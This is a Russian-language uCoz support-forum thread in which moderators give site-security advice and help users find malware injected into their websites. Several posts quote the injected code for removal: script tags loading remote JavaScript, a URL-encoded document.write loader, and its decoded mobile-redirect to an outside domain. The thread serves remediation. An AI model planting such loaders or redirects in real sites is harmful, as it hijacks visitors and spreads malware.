Модератор форума: Yuri_G  
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 1141 | 13:09:39
    Gertryda5537, удалите вредоносный код

    Код
    <script src="http://i1ii.ru/1.js" type="text/javascript"></script>
    sashar7777
    Сообщений: 11
    Репутация: 0

    Сообщение # 1142 | 23:11:33
    Мой комп взломали вчера, толи из за одной программы или как то по другому
    Я переустановил систему,модем даже сбросил и заного настроил ну а вебмастер яндекс выдает ссылки что у меня на сайте мобильный редирект
    Ссылка на сайт помеченный http://my-mobi.3dn.ru/load/igry_na_android/ehkshen/robocop/113-1-0-286
    Сайт http://my-mobi.3dn.ru
    А может еще до этого каким то способом был размещен код некий и мой комп подхватил а не подхватит ли сейчас снова ?
    Антивирус MSE а тот чел тогда чисто компом управлял , писал что я схватил лютый софт и переустановка поможет
    Сможете найти вредоносный код ? Заранее спасибо!!!
    Сообщение отредактировал sashar7777 - Воскресенье, 09 Мар 2014, 23:13:49
    Enein
    Сообщений: 3
    Репутация: 0

    Сообщение # 1143 | 01:58:09
    Пару дней назад подцепился ко всем сайтам такой вот прикол (код advmakerа):
    Код
    <div>
        <script type="text/javascript">var statsScrypt=document.createElement("script");statsScrypt.type="text/javascript";statsScrypt.src="http://cnt3.upstats.ru/"+Math.random()+".js?src=1";document.body.appendChild(statsScrypt);</script>
        <iframe width="1px" height="1px" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" scrolling="no" src="http://am15.net/px.php?rid=46674&d=30&t=html"></iframe>
    </div>

    И это не только на моих сайтах и не только на рабочей машине (провайдер ли - пока хз)..
    Сообщение отредактировал Enein - Понедельник, 10 Мар 2014, 01:59:34
    stalkerss222222
    Сообщений: 12
    Репутация: 0

    Сообщение # 1144 | 20:42:27
    доброго времени суток пользователи и администрация сайта у меня беда скачал шаблон залил настроил как только запустил от яндекса пришло письмо о том что на сайте обнаружен вреданосный код в чем его была фишка заходил с компа все отлично было заходил с планшета или телефона он автоматом переводил на левые сайты и пытался загрузить флеш плеер после чего сайт вообще заблокирован яндеком пишет что найден код и вот прислал его название
    mobile_redirect

    http://www.privet-android.ru/ вот мой сайт помогите мне отыскать эту тварь и унечтожить
    зарние спасибо если что пишите на почту sozdamchat@yandex.ru я отблагодарю конечно же чем быстрее тем лучше))))
    Yuri_G
    uWeb support
    uVip manager
    Сообщений: 4337
    Репутация: 943

    Сообщение # 1145 | 20:52:57
    stalkerss222222, из кода сайта удалите вот этот скрипт

    
    Код
    <script type="text/javascript">
    <!-document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%0A% 64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76 %61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%76%61%74%61%72%69%61%2D%76%6B%6F%6E%74%61%6B%74%65%2E%72%75%2F%6A%73%2F%7 3%69%74%65%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%29%3B%0A%2F%2F%2D%2D%3E%0A%3C%2F%73%63%72%69%70%74%3E'));
    //-->
    </script>

    Добавлено (11 Мар 2014, 20:49:52)
    ---------------------------------------------
    находится данный код сразу после <head>

    Добавлено (11 Мар 2014, 20:52:57)
    ---------------------------------------------
    вот эти скрипты перегрузите к себе на FTP и поменяйте ссылки на свои

    Код
    <script type="text/javascript" src="http://webo4ka.ru/Ucoz7/jquery.min_raketa.js"></script>  
      <script type="text/javascript" src="http://webo4ka.ru/Ucoz7/MrScrollUp_raketa.js"></script>  
      <link rel="stylesheet" type="text/css" href="http://webo4ka.ru/Ucoz7/MrScrollUp_raketa.css" />
    
    закодированный скрипт выше это мобильный вирус в расскодированном виде выглядит
    
    Код
    <!--
    if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){
       window.location = "http://all-musica.ru/site/go.php?sid=1";
    }
    //-->

    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1146 | 20:57:38
    Ucoz_fan,
    Код
    <script type="text/javascript" src="http://webo4ka.ru/Ucoz7/jquery.min_raketa.js"></script>  
    это скрипт лить на сайт не стоит

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Yuri_G
    uWeb support
    uVip manager
    Сообщений: 4337
    Репутация: 943

    Сообщение # 1147 | 21:21:31
    а также в закодированном коде еще есть такой сюрприз который и подгружает сам вирус
    Код
    < script type="text/javascript">
    <!--
    document.write(unescape('< script type= "text/javascript"
    src= "http://avataria-vkontakte.ru/js/site.js"> </script>'));
    //-->
    </script>

    

    Добавлено (11 Мар 2014, 21:17:25)
    ---------------------------------------------
    после очистки желательно пройти процедуру смены паролей в целях безопасности

    Добавлено (11 Мар 2014, 21:21:31)
    ---------------------------------------------

    Цитата webanet ()
    это скрипт лить на сайт не стоит
    ага еще один квери кроме системного, в последующем гарантированы новые сюрпризы

    stalkerss222222
    Сообщений: 12
    Репутация: 0

    Сообщение # 1148 | 09:43:43
    короче как я понял надо удалить эту долбаую ракету с сайта и ту шнягу и все?
    только как долго ждать когда яндекс проверит его ?

    Код
    < script type="text/javascript">  
    <!--  
    document.write(unescape('< script type= "text/javascript"  
    src= "http://avataria-vkontakte.ru/js/site.js"> </script>'));  
    //-->  
    </script>


    я этот не нашол
    Сообщение отредактировал stalkerss222222 - Среда, 12 Мар 2014, 09:56:29
    Yuri_G
    uWeb support
    uVip manager
    Сообщений: 4337
    Репутация: 943

    Сообщение # 1149 | 11:13:23
    Цитата stalkerss222222 ()
    я этот не нашол
    мое первое сообщение на предыдущей странице прочтите и удалите тот скрипт, я писал что это уже раскодированный вариант вируса, а у вас на сайте находится закодированный..

    stalkerss222222
    Сообщений: 12
    Репутация: 0

    Сообщение # 1150 | 11:15:05
    я удалил все что вы мне написали за исключением < script type="text/javascript">
    <!--
    document.write(unescape('< script type= "text/javascript"
    src= "http://avataria-vkontakte.ru/js/site.js"> </script>'));
    //-->
    </script> я это не нашол не на одной странице буду ждать когда его проверят заново

    Добавлено (12 Мар 2014, 11:15:05)
    ---------------------------------------------
    Ucoz_fan, посмотри пожалуйста щас все удалил или нет???

    Yuri_G
    uWeb support
    uVip manager
    Сообщений: 4337
    Репутация: 943

    Сообщение # 1151 | 11:22:12
    Цитата stalkerss222222 ()
    только как долго ждать когда яндекс проверит его
    что-бы он как можно быстрее проверил, напишите в Тех Поддержку с панели вебмастера там с правой стороны есть ссылка написать в Тех Поддержку, напишите что так и так очистка от вируса произведена, снимите с сайта статус о зараженности итп.. Если все удалили то можете писать..

    НеТормози
    Сообщений: 50
    Репутация: 1

    Сообщение # 1152 | 20:48:47
    Доброго времени суток! Который день аваст ругался на вирус. Удалил код со счетчиками и все встало в норму. Почему так не подскажете?

    $ONLINE_COUNTER$
    $ONLINE_USERS_LIST$
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1153 | 20:51:04
    НеТормози, где адрес сайта? верните коды и дайте ссылку на сайт. по вашему сообщению гадать невозможно. читайте правила подачи заявки

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    НеТормози
    Сообщений: 50
    Репутация: 1

    Сообщение # 1154 | 15:42:12
    webanet, Да-да, извиняюсь. Просто это системные коды, может с ними что не так., поэтому ссылку не дал.
    Все вернул. В первом контейнере.
    Сайт

    Добавлено (14 Мар 2014, 15:42:12)
    ---------------------------------------------
    webanet, Если я исключаю это - $ONLINE_COUNTER$ , то АВАСТ перестает ругаться

    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1155 | 18:25:42
    НеТормози, что пишет аваст когда ругается? дайте полный текст ругани аваста

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Поиск: